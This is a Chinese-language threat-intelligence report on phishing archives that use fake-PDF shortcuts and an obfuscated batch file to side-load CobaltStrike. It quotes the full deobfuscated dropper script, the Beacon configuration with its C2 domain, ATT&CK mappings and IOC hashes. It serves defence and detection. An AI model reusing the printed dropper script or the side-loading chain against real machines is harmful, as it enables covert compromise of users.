概述
2023年7月,瑞星威胁情报中心
捕获到多个带有中文诱饵文档的恶意压缩包。这些攻击事件除压缩包名称以及诱饵文档不同之外,其他相关的攻击战术,过程等基本一致。通过分析发现,其攻击链中的最后一步是在受害者机器上部署CobaltStrike
。 CobaltStrike
具有多种功能,包括远程控制、漏洞利用、命令和控制服务器等,可用于渗透测试和网络攻击。
此次捕获的恶意压缩包中的诱饵文档都是由中文编写,第一个诱饵文档名为附件2:供货合同(商品年度采购).pdf
,内容主要是混凝土材料采购供货合同。第二个诱饵文档名为北京市交通委年终总结报告-模版1.pdf
,内容主要是关于工作总结的汇报。第三个诱饵文档名为孙继超-北京大学-硕士.pdf
,内容是关于一名与金融领域相关的专业人士的简历。攻击者可能会利用钓鱼邮件等方式对目标投递这些恶意压缩文件,压缩文件内含有一个伪装成pdf的快捷方式和一个带隐藏属性的__MACOSX\.DOCX
目录,当成功诱使受害者点击此恶意快捷方式后,快捷方式会执行__MACOSX\.DOCX
目录下名为aaa.bat
的批处理文件,利用aaa.bat
打开__MACOSX\.DOCX
目录下的诱饵文档迷惑用户以及使用侧加载技术运行同目录下的CobaltStrike
。
ATT&CK 矩阵
战术 | 技术 | 具体行为 |
---|---|---|
TA0002 -执行 |
T1059 -命令和脚本解释器 |
利用cmd.exe 执行aaa.bat |
TA0002 -执行 |
T1204 -用户执行 |
恶意快捷方式伪装成合法文档,诱骗用户执行 |
TA0005 -防御规避 |
T1574 -劫持执行流 |
利用合法程序加载恶意DLL |
TA0005 -防御规避 |
T1036 -伪装 |
将恶意LNK伪装成合法文档 |
TA0005 -防御规避 |
T1222 -文件和目录权限修改 |
取消多个文件的系统、存档和隐藏属性 |
TA0005 -防御规避 |
T1564 -隐蔽组件 |
存储恶意文件的__MACOSX\.DOCX 目录带隐藏属性 |
TA0005 -防御规避 |
T1027 -混淆过的文件或信息 |
aaa.bat 被混淆,appvisvsubsystems64.dll 带UPX 壳 |
TA0011 -指挥与控制 |
T1071 -应用层协议 |
使用HTTP协议与C2通信 |
TA0010 -外传信息 |
T1041 -通过C2通道外传 |
通过C2外传信息 |
攻击事件
第一起攻击事件中,攻击者投递的诱饵文档名为附件2:供货合同(商品年度采购).pdf
,内容主要是关于混凝土材料采购供货合同,工程名称是2022年度各等级商品
,内容里面写着2023年度各等级商品混凝土供货周期暂定一年
,其中买受人(甲方)为永丰失业商品有限公司,出卖人(乙方)是京东物流有限公司。
第二起攻击事件中,攻击者投递的诱饵文档名为北京市交通委年终总结报告-模版1.pdf
,诱饵文档的内容是关于工作总结的汇报,报告内所需要填写的内容包含工作指责概述
,当前工作内容
,当前工作总结
以及下一步工作规划
等。
第三起攻击事件中,攻击者投递的诱饵文档名为孙继超-北京大学-硕士.pdf
,内容是关于一名与金融领域相关的专业人士的简历,简历内提到此人毕业于中国名校北京大学
,专业为金融学
,熟悉各银行的组织结构及业务特点,了解现金设备和智能硬件。
攻击流程
样本分析
攻击者根据目标投递包含恶意快捷方式附件2:供货合同(商品年度采购).pdf
、北京市交通委年终总结报告-模版1.pdf.lnk
或者孙继超-北京大学-硕士.pdf.lnk
的同名压缩文件,该压缩包除了含有上述快捷方式以外,还带有一个含隐藏属性的名为__MACOSX\.DOCX
的目录,此目录下含有与快捷方式同名的诱饵文档,以及名为aaa.bat
,wda.tmp
和mbp.tmp
的文件。
1. 恶意快捷方式分析
字段 | 内容 |
---|---|
文件名1 | 北京市交通委年终总结报告-模版1.pdf.lnk |
文件名2 | 孙继超-北京大学-硕士.pdf.lnk.lnk |
文件大小 | 1.76 KB (1799 bytes) |
文件MD5 | 170C6C58FA5BD8CFD9F0AE6DAD10081D |
文件类型 | LNK |
病毒名 | Trojan.DocStarter/LNK!1.BB5F |
VT首次提交日期 | 2023-07-04 |
字段 | 内容 |
---|---|
文件名 | 附件2:供货合同(商品年度采购).pdf.lnk |
文件大小 | 1.75 KB (1793 bytes) |
文件MD5 | 3052B739FD49A3ED479147AF62F9BB21 |
文件类型 | LNK |
病毒名 | Trojan.DocStarter/LNK!1.BB5F |
VT首次提交日期 | 2023-07-06 |
恶意快捷方式目的是利用系统下的cmd.exe
程序执行隐藏目录__MACOSX\.DOCX
中的 aaa.bat
批处理文件。
%windir%\system32\cmd.exe /c "__MACOSX\.DOCX\aaa.bat"
2. aaa.bat文件分析
字段 | 内容 |
---|---|
文件名 | aaa.bat |
文件大小 | 69.32 KB (70988 bytes) |
文件MD5 | 66FB56B05B7187E4398275DF79A0060D |
文件类型 | Batch |
其他说明 | 该BAT被进行了混淆 |
攻击者使用了Batch Encryption
工具对aaa.bat
进行了混淆,可以通过开源工具Batch Encryption DeCoder
解除混淆。当aaa.bat
运行起来后会执行以下操作:
- 将隐藏目录
__MACOSX\.DOCX
中的文件wda.tm
和mbp.tmp
复制到文件夹C:\ProgramData
中。 - 取消
C:\ProgramData\wda.tmp
和C:\ProgramData\mbp.tmp
的系统
、存档
和隐藏
属性。 - 将文件夹
C:\ProgramData
中的wda.tmp
重命名为OfficeUpdate.exe
,将mbp.tmp
重命名为appvisvsubsystems64.dll
。 - 取消
__MACOSX\.DOCX
目录中的wda.tmp
以及aaa.bat
的系统
、存档
和隐藏
属性 - 将
__MACOSX\.DOCX
目录中的快捷方式同名诱饵文档复制到当前LNK目录下。 - 打开诱饵文档迷惑用户,执行
C:\ProgramData\officeUpdate.exe
加载恶意C:\ProgramData\appvisvsubsystems64.dll
。 - 删除
__MACOSX\.DOCX
目录中的wda.tmp
,aaa.bat
。 - 删除LNK文件。
cmd /c xcopy /h /y %cd%\__MACOSX\.DOCX\wda.tmp C:\ProgramData\
xcopy /h /y %cd%\__MACOSX\.DOCX\mbp.tmp C:\ProgramData\
attrib -s -a -h C:\ProgramData\wda.tmp
rename C:\ProgramData\wda.tmp officeUpdate.exe
attrib -s -a -h C:\ProgramData\mbp.tmp
rename C:\ProgramData\mbp.tmp appvisvsubsystems64.dll
attrib -s -a -h %cd%\__MACOSX\.DOCX\wda.tmp
del "%cd%\__MACOSX\.DOCX\wda.tmp"
attrib -s -a -h %cd%\__MACOSX\.DOCX\aaa.bat
del *.pdf.lnk
copy %cd%\__MACOSX\.DOCX\孙继超-北京大学-硕士.pdf %cd%\孙继超-北京大学-硕士.pdf
start %cd%\孙继超-北京大学-硕士.pdf
start C:\ProgramData\officeUpdate.exe
del /s /q /f %0
3. appvisvsubsystems64.dll分析
字段 | 内容 |
---|---|
文件名 | appvisvsubsystems64.dll |
文件大小 | 1.53 MB (1607882 bytes) |
文件MD5 | BD1EEC36517FC58C2A11A5A908811539 |
文件类型 | Win32 DLL |
攻击者在C:\ProgramData
中释放OfficeUpdate.exe
和appvisvsubsystems64.dll
。其中OfficeUpdate.exe
来自Microsoft Office
,是个合法程序,原程序名为WinWord.exe
。恶意的appvisvsubsystems64.dll
将通过侧加载技术被OfficeUpdate.exe
执行起来。通过分析,appvisvsubsystems64.dll
带UPX
壳,由Go
语言编写,并和CobaltStrike
相关,其内CobaltStrike
配置信息如下:
{
"BeaconType": ["Hybrid HTTP DNS"],
"Port": 1,
"SleepTime": 3000,
"MaxGetSize": 2097974,
"Jitter": 31,
"MaxDNS": 255,
"C2Server": "info.gtjas.site,/functionalStatus/TqKwawSVfLIhmsolAo7M2TzcQ8",
"DNS_Idle": "0.0.0.0",
"DNS_Sleep": 0,
"HttpGet_Verb": "GET",
"HttpPost_Verb": "GET",
"HttpPostChunk": 96,
"Spawnto_x86": "%windir%\\syswow64\\mcbuilder.exe",
"Spawnto_x64": "%windir%\\sysnative\\mcbuilder.exe",
"CryptoScheme": 0,
"Watermark": 100000,
"bStageCleanup": "True",
"bCFGCaution": "False",
}
通过分析C2Server
,发现info.gtjas.site
曾解析的IP为123.60.89.125
,其基本属性如下。该IP指向中国,服务提供商来自华为云。
Network 123.60.0.0/16
Autonomous System Number 55990
Autonomous System Label Huawei Cloud Service data center
Regional Internet Registry APNIC
Country CN
Continent AS
关联分析
除了上述样本外,瑞星威胁情报中心
于7月还发现另一起和这些类似的样本。该恶意样本名为礼品卡领取使用说明.pdf.rar
,是个rar格式的压缩文件。其内含有用于迷惑用户的同名诱饵文档礼品卡领取使用说明.pdf
,诱饵文档内容介绍了阳澄湖大闸蟹礼券礼卡提蟹卡,然后是对于公司员工所选择的提蟹卡类型地登记,登记项包含提取人姓名,礼品规格,公司部门等。
恶意样本礼品卡领取使用说明.pdf.rar
中含有一个伪装成PDF的快捷方式和一个带隐藏属性的__MACOSX\.DOCX
目录,与上述样本不同的是,__MACOSX\.DOCX
目录下除了同名PDF诱饵文档文件外,其有aaa.bat
,wda.tmp
,wda.tmp
以及adcc.bin
这四个文件。攻击者会将wda.tmp
,wda.tmp
和adcc.bin
这3个文件藏于%temp%
目录中,其中wda.tmp
是合法程序,攻击者会将其伪装成360sd.exe
。wda.tmp
和adcc.bin
则与CobaltStrike
相关,其中wda.tmp
被伪装成python27.dll
。当成功诱使受害者点击此恶意快捷方式后,快捷方式会执行__MACOSX\.DOCX
目录下名为aaa.bat
的批处理文件,利用aaa.bat
打开__MACOSX\.DOCX
目录下的诱饵文档迷惑用户以及利用侧加载等技术运行同目录下的CobaltStrike
。
字段 | 内容 |
---|---|
文件名1 | 礼品卡领取使用说明.pdf.rar |
文件大小 | 1.74 MB (1826362 bytes) |
文件MD5 | 405AE78B997AEFAF49B7D2619FEBFF99 |
文件类型 | RAR |
VT首次提交日期 | 2023-07-06 |
与上述7月份礼品卡领取使用说明.pdf.rar
恶意样本类似的还有4月份的两起名为华润集团体操大赛回顾.rar
和员工满意度调查表.zip
的恶意样本。其都是利用快捷方式执行BAT
文件,最终释放同名诱饵文档迷惑用户以及运行CobaltStrike
。
预防措施
-
不打开可疑文件。
不打开未知来源的可疑的文件和邮件,防止社会工程学和钓鱼攻击。
-
部署网络安全态势感知、预警系统等网关安全产品。
网关安全产品可利用威胁情报追溯威胁行为轨迹,帮助用户进行威胁行为分析、定位威胁源和目的,追溯攻击的手段和路径,从源头解决网络威胁,最大范围内发现被攻击的节点,帮助企业更快响应和处理。
-
安装有效的杀毒软件,拦截查杀恶意文档和木马病毒。
杀毒软件可拦截恶意文档和木马病毒,如果用户不小心下载了恶意文件,杀毒软件可拦截查杀,阻止病毒运行,保护用户的终端安全。
瑞星ESM目前已经可以检出此次攻击事件的相关样本。
- 及时修补系统补丁和重要软件的补丁。
沦陷信标(IOC)
-
MD5
7F789DBA1406B5AFA6FB4F321DE600D6 8567385620BD48989670483FA519FEB3 4FA748FFCEE5382F55A3FC6CDA6F9C34 9050EBC61B1EB3AD76D95F7A253AA519 765FF930442C931B3C194FFF081E392E 170C6C58FA5BD8CFD9F0AE6DAD10081D BF201BD35170ACEEA005ABB7C37874E0 BD1EEC36517FC58C2A11A5A908811539 2B329A0FB38B6280C41B47C8116D52D1 9CC1AE38783FEE7906E6EFBDA0AF3DC7 405AE78B997AEFAF49B7D2619FEBFF99 9C6781EE7A11F6E7964C0CAA4A8460E7 3052B739FD49A3ED479147AF62F9BB21 D75D03DF69C09B697CFEC8B3673E6E34 9BDBEFADAFDE26A0925CC3B56F3C90B6 7A61340E8A8595832008CB6D6F6AC96F 937366F2EAA26199DEF54FB434FF7059 6BC9AAECF7523F15001D3A048B0211C8 7BAB3C211B0E01373D4EBA7503C6162E 171510E7F3217E2B2F899813D5B62BA1 B646AD4B6AA216109889EB5F0DD06B2C 065535D96270DE1A20183CD678E2CB5C E1E70423A87C9C73287942D0EE2AEB72 1175502367BE9044F0DABB5A28CDB0EC 66FB56B05B7187E4398275DF79A0060D
-
Domain
info.gtjas.site